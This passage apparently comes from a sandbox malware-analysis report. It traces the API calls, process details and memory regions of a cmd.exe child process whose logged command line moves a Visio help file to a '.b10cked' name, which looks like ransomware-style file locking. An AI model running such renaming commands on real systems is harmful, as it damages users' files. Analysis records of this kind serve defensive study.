_wcsicmp 
(_String1="move", _String2=")") returned 68 [0202.496] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.496] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.496] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.496] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.496] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.496] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.499] GetConsoleTitleW (in: lpConsoleTitle=0x16f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.500] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.500] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.500] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.500] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.500] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.500] 
_wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.500] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.500] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.500] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.500] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.500] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.500] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.500] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.502] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f78c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f784, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f784*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) 
returned 3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.502] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.503] 
_wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.503] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.503] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.503] _wcsicmp (_String1="MSVISI~3.HXN", _String2=".") returned 63 [0202.503] _wcsicmp (_String1="MSVISI~3.HXN", _String2="..") returned 63 [0202.503] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~3.hxn")) returned 0x2022 [0202.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.503] SetErrorMode (uMode=0x0) returned 0x0 [0202.503] SetErrorMode (uMode=0x1) returned 0x0 [0202.503] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", nBufferLength=0x104, lpBuffer=0x16f114, lpFilePart=0x16f0fc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", lpFilePart=0x16f0fc*="MSVISI~3.HXN") returned 0x27 [0202.503] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.504] _wcsicmp (_String1="MSVISI~3.HXN", _String2=".") returned 63 [0202.504] _wcsicmp (_String1="MSVISI~3.HXN", _String2="..") returned 63 [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~3.hxn")) returned 0x2022 [0202.504] SetErrorMode (uMode=0x0) returned 0x0 [0202.504] SetErrorMode (uMode=0x1) returned 0x0 [0202.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", nBufferLength=0x104, lpBuffer=0x16f590, lpFilePart=0x16f328 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", lpFilePart=0x16f328*="MSVISI~3.HXN") returned 0x27 [0202.504] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] SetErrorMode (uMode=0x0) returned 0x0 [0202.504] SetErrorMode (uMode=0x1) returned 0x0 [0202.504] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x16f798, lpFilePart=0x16f328 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked", lpFilePart=0x16f328*="MS.VISIO.DEV.14.1033.hxn.b10cked") returned 0x3b [0202.504] SetErrorMode (uMode=0x0) returned 0x1 [0202.504] SetLastError (dwErrCode=0x0) [0202.504] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.504] GetLastError () returned 0x2 [0202.504] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x16eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eca4) returned 0x310e88 [0202.504] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x16eca4 | out: lpFindFileData=0x16eca4) returned 0 [0202.505] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.505] GetLastError () returned 0x12 [0202.505] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x16eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16eca4) returned 0x310e88 [0202.505] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x16eca4 | out: lpFindFileData=0x16eca4) returned 0 [0202.505] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.505] GetLastError () returned 0x12 [0202.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, 
lpFindFileData=0x321bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf0) returned 0x310e88 [0202.506] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x321bf0 | out: lpFindFileData=0x321bf0) returned 0 [0202.506] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.506] GetLastError () returned 0x12 [0202.506] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~3.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf0) returned 0x310e88 [0202.506] FindNextFileW (in: hFindFile=0x310e88, lpFindFileData=0x321bf0 | out: lpFindFileData=0x321bf0) returned 0 [0202.506] FindClose (in: hFindFile=0x310e88 | out: hFindFile=0x310e88) returned 1 [0202.506] GetLastError () returned 0x12 [0202.507] _get_osfhandle (_FileHandle=2) returned 0xb [0202.507] GetFileType (hFile=0xb) returned 0x2 [0202.663] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.664] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ee74 | out: lpMode=0x16ee74) returned 1 [0202.664] _get_osfhandle (_FileHandle=2) returned 0xb [0202.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16eea8 | out: lpConsoleScreenBufferInfo=0x16eea8) returned 1 [0202.664] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.665] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eee8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x16eecc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eecc*=0x2c) 
returned 1 [0202.665] longjmp () [0202.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.665] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.666] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.666] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.666] SetConsoleInputExeNameW () returned 0x1 [0202.666] GetConsoleOutputCP () returned 0x1b5 [0202.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.666] exit (_Code=1) Process: id = "479" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d00" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~4.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.SHAPESHEET.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29376 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29377 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29378 start_va = 0x130000 
end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29379 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29380 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29381 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29382 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29383 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29384 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29385 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29854 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29855 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29856 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 29857 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = 
"locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29858 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 29859 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29861 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29862 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29863 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29864 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29865 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29868 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 29869 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29871 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 29872 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 29873 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29874 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 29875 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 29876 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29877 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 29981 start_va = 0x12d0000 end_va = 0x138ffff entry_point = 
0x12d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 676 os_tid = 0xd4c [0202.368] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb44 | out: lpSystemTimeAsFileTime=0x12fb44*(dwLowDateTime=0xad6dcd20, dwHighDateTime=0x1d440a9)) [0202.368] GetCurrentProcessId () returned 0xd90 [0202.368] GetCurrentThreadId () returned 0xd4c [0202.368] GetTickCount () returned 0x391d3 [0202.368] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb3c | out: lpPerformanceCount=0x12fb3c*=25915729717) returned 1 [0202.369] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.369] __set_app_type (_Type=0x1) [0202.369] __p__fmode () returned 0x76b331f4 [0202.369] __p__commode () returned 0x76b331fc [0202.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.369] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.369] GetCurrentThreadId () returned 0xd4c [0202.369] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd4c) returned 0x38 [0202.369] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.369] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.369] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.369] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fad4 | out: phkResult=0x12fad4*=0x0) returned 0x2 [0202.369] VirtualQuery (in: lpAddress=0x12fb0b, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x12f000, 
AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.369] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.370] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12faa4, dwLength=0x1c | out: lpBuffer=0x12faa4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.370] GetConsoleOutputCP () returned 0x1b5 [0202.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.370] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.370] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.370] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.371] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.371] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.371] GetEnvironmentStringsW () returned 0x1a01a0* [0202.371] FreeEnvironmentStringsW (penv=0x1a01a0) returned 1 [0202.371] GetEnvironmentStringsW () returned 0x1a01a0* [0202.371] FreeEnvironmentStringsW (penv=0x1a01a0) returned 1 [0202.371] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea44 | out: phkResult=0x12ea44*=0x40) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0xc8, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x0, lpData=0x12ea50*=0x1, lpcbData=0x12ea48*=0x1000) returned 0x2 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x0, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea4c, lpData=0x12ea50, lpcbData=0x12ea48*=0x1000 | out: lpType=0x12ea4c*=0x4, lpData=0x12ea50*=0x40, lpcbData=0x12ea48*=0x4) returned 0x0 [0202.371] RegQueryValueExW (in: hKey=0x40, 
